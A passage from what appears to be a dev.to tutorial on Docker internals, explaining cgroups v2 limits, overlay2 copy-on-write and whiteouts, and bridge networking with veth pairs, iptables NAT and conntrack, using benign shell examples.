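&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# List the namespaces the current shell belongs to
ls -1 /proc/self/ns
# cgroup ipc mnt net pid ... user uts (exact set depends on kernel version)

# The symlink target encodes the namespace inode, e.g. uts:[4026531838]
readlink /proc/self/ns/uts
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Comparing &lt;code&gt;/proc/1/ns/pid&lt;/code&gt; on the host with the same path inside a container is a quick way to confirm the container really lives in its own PID namespace.&lt;/p&gt;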




&lt;h2&gt;
  
  
  7. cgroups: Resource Control
&lt;/h2&gt;

&lt;p&gt;While namespaces provide &lt;strong&gt;isolation&lt;/strong&gt; (what you can &lt;em&gt;see&lt;/em&gt;), cgroups provide &lt;strong&gt;control&lt;/strong&gt; (what you can &lt;em&gt;use&lt;/em&gt;). cgroups (control groups) are a Linux kernel feature that lets you partition system resources among processes.&lt;/p&gt;

&lt;p&gt;Docker uses &lt;strong&gt;cgroups v2&lt;/strong&gt; (the unified hierarchy) on modern systems.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3kt7c9t4vbothgeumdpl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3kt7c9t4vbothgeumdpl.png" alt="cgroups" width="800" height="502"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  How Docker Maps Your Flags to cgroups
&lt;/h3&gt;

&lt;p&gt;When you run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;--cpus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0.5 &lt;span class="nt"&gt;--memory&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;512m &lt;span class="nt"&gt;--pids-limit&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50 my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Docker translates these into cgroup filesystem writes:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Docker Flag&lt;/th&gt;
&lt;th&gt;cgroup File&lt;/th&gt;
&lt;th&gt;Value Written&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--cpus=0.5&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cpu.max&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;50000 100000&lt;/code&gt; (50ms per 100ms period)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--memory=512m&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;memory.max&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;536870912&lt;/code&gt; (bytes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;--memory-swap=512m&lt;/code&gt; (equal to &lt;code&gt;--memory&lt;/code&gt;, i.e. swap disabled)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;memory.swap.max&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;0&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--pids-limit=50&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pids.max&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;50&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--blkio-weight=100&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;io.weight&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;100&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The kernel &lt;strong&gt;enforces&lt;/strong&gt; these limits. If a container tries to allocate more memory than &lt;code&gt;memory.max&lt;/code&gt;, the kernel's &lt;strong&gt;OOM killer&lt;/strong&gt; kicks in and terminates the offending process. The container doesn't crash silently — it gets a &lt;code&gt;137&lt;/code&gt; (SIGKILL) exit code.&lt;/p&gt;
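&lt;p&gt;The translations in the table are plain arithmetic, which you can verify yourself (values match the table above):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# --memory=512m  -&gt;  memory.max in bytes
echo $(( 512 * 1024 * 1024 ))
# 536870912

# --cpus=0.5  -&gt;  cpu.max "quota period": half of the default 100000us period
echo "$(( 100000 / 2 )) 100000"
# 50000 100000

# An OOM-killed process exits with 128 + signal number, and SIGKILL is 9
echo $(( 128 + 9 ))
# 137
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;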




&lt;h2&gt;
  
  
  8. Union Filesystems and Storage Drivers
&lt;/h2&gt;

&lt;p&gt;Here's the problem: Docker images are &lt;strong&gt;read-only&lt;/strong&gt; (they're just layers stacked on top of each other), but containers need to &lt;strong&gt;write files&lt;/strong&gt; (logs, temp files, config changes). How do you let a container modify files without breaking the original image?&lt;/p&gt;

&lt;p&gt;The solution is &lt;strong&gt;overlay2&lt;/strong&gt; — think of it like transparent sheets stacked on top of each other.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.1 The Transparent Sheets Analogy
&lt;/h3&gt;

&lt;p&gt;Imagine you have a stack of transparent sheets:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Bottom sheets (read-only)&lt;/strong&gt;: These are the Docker image layers. They contain &lt;code&gt;/bin/bash&lt;/code&gt;, &lt;code&gt;/usr/sbin/nginx&lt;/code&gt;, etc. You can look through them but you can't write on them.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Top sheet (writable)&lt;/strong&gt;: This is created fresh for each container. When you start a container, Docker puts a blank writable sheet on top.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When you look down from above, you see all the sheets merged together — this is what the container sees as its filesystem (&lt;code&gt;/&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp0uwctlmfqb4vduyl03h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp0uwctlmfqb4vduyl03h.png" alt="transparent sheet analogy" width="800" height="761"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  8.2 Four Scenarios: Read, Modify, Create, Delete
&lt;/h3&gt;

&lt;p&gt;Let's walk through what happens when a container interacts with files:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scenario 1: Reading an existing file&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; /bin/bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The file exists in the &lt;strong&gt;lower (image) layers&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;overlay2 reads it directly from there&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No copying, instant access&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Multiple containers reading the same file? They all read the same disk blocks — zero duplication&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Scenario 2: Modifying an existing file&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"listen 8080;"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/nginx/nginx.conf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here's where &lt;strong&gt;copy-on-write&lt;/strong&gt; happens:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;First&lt;/strong&gt;: The file &lt;code&gt;/etc/nginx/nginx.conf&lt;/code&gt; exists in the lower (image) layer&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Container tries to write&lt;/strong&gt;: overlay2 intercepts this&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Copy entire file up&lt;/strong&gt;: The whole file gets copied from the lower layer to the &lt;strong&gt;upper (writable) layer&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modify the copy&lt;/strong&gt;: The container writes to the copy in the upper layer&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Future reads&lt;/strong&gt;: The container now sees the modified version (upper layer wins)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The original file in the lower layer is &lt;strong&gt;never touched&lt;/strong&gt; — it stays pristine. When you stop and delete the container, the upper layer is destroyed. The image is unchanged.&lt;/p&gt;
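&lt;p&gt;The "upper layer wins" rule can be sketched in plain shell, with ordinary directories standing in for the layers (no real overlay mount or root privileges needed; directory names are made up for the demo):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Two stand-in layers: "lower" plays the image, "upper" the container's writable layer
mkdir -p demo/lower demo/upper
echo "listen 80;"   &gt; demo/lower/nginx.conf   # pristine file from the image
echo "listen 8080;" &gt; demo/upper/nginx.conf   # the copied-up, modified version

# overlayfs resolves a path by consulting upperdir first, then lowerdir
lookup() {
  if [ -e "demo/upper/$1" ]; then cat "demo/upper/$1"; else cat "demo/lower/$1"; fi
}
lookup nginx.conf
# listen 8080;

rm -rf demo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;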

&lt;p&gt;&lt;strong&gt;Scenario 3: Creating a new file&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"Hello"&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /opt/app/new-file.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;This file doesn't exist in the image layers&lt;/li&gt;
&lt;li&gt;It's created directly in the &lt;strong&gt;upper (writable) layer&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Only this container sees it&lt;/li&gt;
&lt;li&gt;When the container is deleted, the file vanishes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Scenario 4: Deleting a file that exists in the image&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Inside the container  &lt;/span&gt;
&lt;span class="nb"&gt;rm&lt;/span&gt; /etc/old-config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The file exists in the &lt;strong&gt;lower (image) layer&lt;/strong&gt; — you can't actually delete it (it's read-only)&lt;/li&gt;
&lt;li&gt;Instead, overlay2 records a special &lt;strong&gt;whiteout&lt;/strong&gt; entry for &lt;code&gt;old-config&lt;/code&gt; in the upper layer. On disk this is a character device with device number 0/0; the &lt;code&gt;.wh.&lt;/code&gt; filename prefix you may have seen is the convention used inside image tarballs (and by AUFS), not on a live overlay2 mount&lt;/li&gt;
&lt;li&gt;When the kernel sees the whiteout, it &lt;strong&gt;hides&lt;/strong&gt; the original file from the lower layer&lt;/li&gt;
&lt;li&gt;The container thinks the file is deleted, but it still exists in the image layer&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  8.3 Why This Matters
&lt;/h3&gt;

&lt;p&gt;This design gives Docker three critical properties:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Disk efficiency&lt;/strong&gt;: Starting 100 containers from the same image uses almost zero extra disk space initially. They all share the same read-only image layers. Only the writable upper layer (which starts empty) is unique per container.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Fast startup&lt;/strong&gt;: No need to copy the entire filesystem — just create an empty upper layer and you're ready to go.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Image immutability&lt;/strong&gt;: The original image layers are never modified. You can run a container, mess it up completely, delete it, and start fresh from the exact same image — nothing is corrupted.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.4 The Full Picture
&lt;/h3&gt;

&lt;p&gt;Here's how overlay2 actually mounts the filesystem:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Simplified version of what Docker does behind the scenes&lt;/span&gt;
mount &lt;span class="nt"&gt;-t&lt;/span&gt; overlay overlay &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;lowerdir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/lib/docker/overlay2/l/LAYER1:/var/lib/docker/overlay2/l/LAYER2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;upperdir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/lib/docker/overlay2/abc123/diff &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;workdir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/lib/docker/overlay2/abc123/work &lt;span class="se"&gt;\&lt;/span&gt;
  /var/lib/docker/overlay2/abc123/merged
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;lowerdir&lt;/strong&gt;: The read-only image layers (colon-separated list)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;upperdir&lt;/strong&gt;: The writable layer for this specific container&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;workdir&lt;/strong&gt;: Temporary scratch space overlay2 uses internally (you can ignore this)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;merged&lt;/strong&gt;: Where the unified view appears — this is what the container sees as &lt;code&gt;/&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the container is deleted, Docker just removes the &lt;code&gt;upperdir&lt;/code&gt; and &lt;code&gt;workdir&lt;/code&gt; directories. The &lt;code&gt;lowerdir&lt;/code&gt; (image layers) stay intact and can be reused immediately for the next container.&lt;/p&gt;




&lt;h2&gt;
  
  
  9. Networking Internals
&lt;/h2&gt;

&lt;p&gt;Docker containers are isolated in their own &lt;strong&gt;network namespace&lt;/strong&gt; — they have their own network stack, their own IP address, their own routing table. But how does traffic from the outside world reach them? And how do containers talk to each other?&lt;/p&gt;

&lt;p&gt;The answer involves four key components working together like a postal system.&lt;/p&gt;

&lt;h3&gt;
  
  
  9.1 The Four Components
&lt;/h3&gt;

&lt;p&gt;Think of Docker networking like a building's internal mail system:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;veth pairs&lt;/strong&gt; — Virtual cables connecting the container to the host (like a mail slot in each apartment door)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;docker0 bridge&lt;/strong&gt; — A virtual network switch that connects all containers (like the building's mailroom)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;iptables DNAT&lt;/strong&gt; — Rewrites destination addresses for incoming packets (like the front desk forwarding mail to apartments)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;iptables SNAT&lt;/strong&gt; — Rewrites source addresses for outgoing packets (like the building's return address on all outgoing mail)&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  9.2 The Big Picture: How Traffic Flows
&lt;/h3&gt;

&lt;p&gt;Let's trace what happens when someone accesses your containerized nginx server with &lt;code&gt;docker run -p 8080:80 nginx&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdj1ivr7beb3pxqveh7d1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdj1ivr7beb3pxqveh7d1.png" alt="how traffic flows" width="784" height="2049"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  9.3 Step-by-Step: What Happens with &lt;code&gt;-p 8080:80&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;Let's break down the journey of a single HTTP request step by step.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setup (happens once at container start):&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When you run &lt;code&gt;docker run -p 8080:80 nginx&lt;/code&gt;, Docker does this:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Creates a veth pair&lt;/strong&gt; — Two virtual network interfaces connected like a pipe. One end (&lt;code&gt;veth1a2b3c&lt;/code&gt;) stays on the host, the other (&lt;code&gt;eth0&lt;/code&gt;) goes into the container's network namespace.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Attaches the host end to docker0&lt;/strong&gt; — The &lt;code&gt;docker0&lt;/code&gt; bridge is a virtual Layer 2 switch. All container veth pairs plug into it, like devices plugged into a physical switch.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Assigns an IP to the container&lt;/strong&gt; — The container's &lt;code&gt;eth0&lt;/code&gt; gets an IP from the bridge's subnet, usually &lt;code&gt;172.17.0.2/16&lt;/code&gt;. The bridge itself is &lt;code&gt;172.17.0.1&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Adds iptables rules&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;DNAT rule&lt;/strong&gt; (PREROUTING chain): "If a packet arrives at port 8080, rewrite its destination to &lt;code&gt;172.17.0.2:80&lt;/code&gt;"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SNAT rule&lt;/strong&gt; (POSTROUTING chain): "If a packet from &lt;code&gt;172.17.0.0/16&lt;/code&gt; is leaving the host, rewrite its source to the host's IP"&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Request path (inbound traffic):&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Now a client outside the host (say &lt;code&gt;203.0.113.5&lt;/code&gt;) visits &lt;code&gt;http://192.168.1.10:8080&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;① Packet arrives at host NIC&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Source:      203.0.113.5:54321 (external client)
Destination: 192.168.1.10:8080 (host's IP and published port)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;② iptables DNAT rewrites destination&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;The PREROUTING rule fires:
-A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.17.0.2:80

Packet becomes:
Source:      203.0.113.5:54321 (unchanged)
Destination: 172.17.0.2:80 (container's IP and port)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;③ Packet routed to docker0 bridge&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The kernel's routing table sees destination &lt;code&gt;172.17.0.2&lt;/code&gt; is on the &lt;code&gt;docker0&lt;/code&gt; subnet. It forwards the packet to the bridge.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;④ Bridge forwards to correct veth&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The bridge has learned which container has IP &lt;code&gt;172.17.0.2&lt;/code&gt; (via ARP). It forwards the packet out the correct veth pair.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⑤ Packet arrives at container's eth0&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Inside the container's network namespace, nginx sees:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Incoming connection from 203.0.113.5:54321 to 172.17.0.2:80
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nginx processes the request and sends a response.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Response path (outbound traffic):&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⑥ Response leaves container&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Source:      172.17.0.2:80 (container)
Destination: 203.0.113.5:54321 (original client)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;⑦ Packet crosses veth pair to bridge&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The container's default gateway is &lt;code&gt;172.17.0.1&lt;/code&gt; (the bridge). Packet goes back through the veth pair to the host.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⑧ Source address rewritten on the way out&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;This reply belongs to a connection that was DNATed on the way in, so conntrack
simply reverses that translation:

Packet becomes:
Source:      192.168.1.10:8080 (the endpoint the client originally contacted)
Destination: 203.0.113.5:54321 (unchanged)

The MASQUERADE (SNAT) rule handles connections that a container initiates
itself (e.g., an outbound API call):
-A POSTROUTING -s 172.17.0.0/16 ! -o docker0 -j MASQUERADE

It means: "For any packet from the 172.17.0.0/16 subnet (the docker0 bridge
network) that is NOT leaving via the docker0 interface (! -o docker0), rewrite
its source address to the host's IP."
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What is 172.17.0.0/16?&lt;/strong&gt; This is &lt;strong&gt;subnet notation&lt;/strong&gt; (CIDR) representing the entire IP range that docker0 manages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;172.17.0.1&lt;/code&gt; — docker0 bridge (gateway)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;172.17.0.2&lt;/code&gt; — Our container&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;172.17.0.3&lt;/code&gt; to &lt;code&gt;172.17.255.254&lt;/code&gt; — Other possible container IPs (&lt;code&gt;172.17.255.255&lt;/code&gt; is the broadcast address)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;172.17.0.0/16&lt;/code&gt; — The whole subnet (all of the above)&lt;/li&gt;
&lt;/ul&gt;
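&lt;p&gt;The &lt;code&gt;/16&lt;/code&gt; suffix means the first 16 bits are the network prefix, leaving 16 bits for host addresses; a quick check of how many container addresses that allows:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# 16 host bits =&gt; 2^16 addresses in 172.17.0.0/16
echo $(( 1 &lt;&lt; 16 ))
# 65536

# Minus the network address, the broadcast address, and the bridge's own .1,
# that leaves room for 65533 containers on one bridge
echo $(( (1 &lt;&lt; 16) - 3 ))
# 65533
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;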

&lt;p&gt;&lt;strong&gt;Why rewrite the source at all?&lt;/strong&gt; The external client sent the request to &lt;code&gt;192.168.1.10:8080&lt;/code&gt;. If the response came back from &lt;code&gt;172.17.0.2:80&lt;/code&gt; (a private IP it has never heard of), the client's TCP stack would discard it as unrelated traffic. Restoring the source to the host's IP and port keeps the exchange looking like one ordinary connection.&lt;/p&gt;

&lt;p&gt;The kernel maintains a &lt;strong&gt;connection tracking table&lt;/strong&gt; (conntrack) that remembers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Inbound: Client's packet to &lt;code&gt;192.168.1.10:8080&lt;/code&gt; was DNATed to &lt;code&gt;172.17.0.2:80&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Outbound: The container's reply from &lt;code&gt;172.17.0.2:80&lt;/code&gt; gets its source rewritten back to &lt;code&gt;192.168.1.10:8080&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the response packet reaches the client, conntrack ensures the client sees it as coming from the same endpoint it originally contacted (&lt;code&gt;192.168.1.10:8080&lt;/code&gt;), making the whole exchange appear as a normal TCP connection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⑨ Response sent to client&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;From the client's perspective, it had a normal TCP conversation with &lt;code&gt;192.168.1.10:8080&lt;/code&gt;. It has no idea a container was involved.&lt;/p&gt;

&lt;h3&gt;
  
  
  9.4 Container-to-Container Communication
&lt;/h3&gt;

&lt;p&gt;When two containers on the same host talk to each other, it's much simpler — &lt;strong&gt;no NAT required&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmlmi1t4uanszmef4jc5l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmlmi1t4uanszmef4jc5l.png" alt="container-container communication" width="800" height="149"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Container A sends a packet to &lt;code&gt;172.17.0.3&lt;/code&gt; (Container B's IP)&lt;/li&gt;
&lt;li&gt;The packet goes through A's veth pair to the &lt;code&gt;docker0&lt;/code&gt; bridge&lt;/li&gt;
&lt;li&gt;The bridge sees the destination MAC address (learned via ARP) and forwards directly to B's veth pair&lt;/li&gt;
&lt;li&gt;Packet arrives at Container B — &lt;strong&gt;no address translation needed&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is why containers on the same Docker network can talk to each other using their container names as hostnames — Docker runs an embedded DNS server that resolves container names to their bridge IPs.&lt;/p&gt;

&lt;h3&gt;
  
  
  9.5 Why This Design?
&lt;/h3&gt;

&lt;p&gt;This architecture gives Docker:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Isolation&lt;/strong&gt;: Each container has its own network stack. One container can't sniff traffic from another (different network namespaces).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Portability&lt;/strong&gt;: Containers always see themselves with the same internal IP (e.g., &lt;code&gt;172.17.0.2&lt;/code&gt;), regardless of what host IP they're running on.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Flexibility&lt;/strong&gt;: You can expose different host ports (8080, 8081, 8082) all pointing to the same container port (80), allowing multiple containers to run the same service.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Performance&lt;/strong&gt;: Container-to-container traffic never leaves the host. It still traverses the kernel's network stack, but forwarding across the bridge is an in-memory operation with no physical NIC or wire involved.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;docker0&lt;/code&gt; bridge is created automatically when Docker starts. You can see it with &lt;code&gt;ip addr show docker0&lt;/code&gt; on the host. Every running container gets a veth pair, and &lt;code&gt;brctl show docker0&lt;/code&gt; (or the newer &lt;code&gt;bridge link&lt;/code&gt;) will list the attached interfaces.&lt;/p&gt;




&lt;h2&gt;
  
  
  10. The Full Lifecycle: Start to Finish
&lt;/h2&gt;

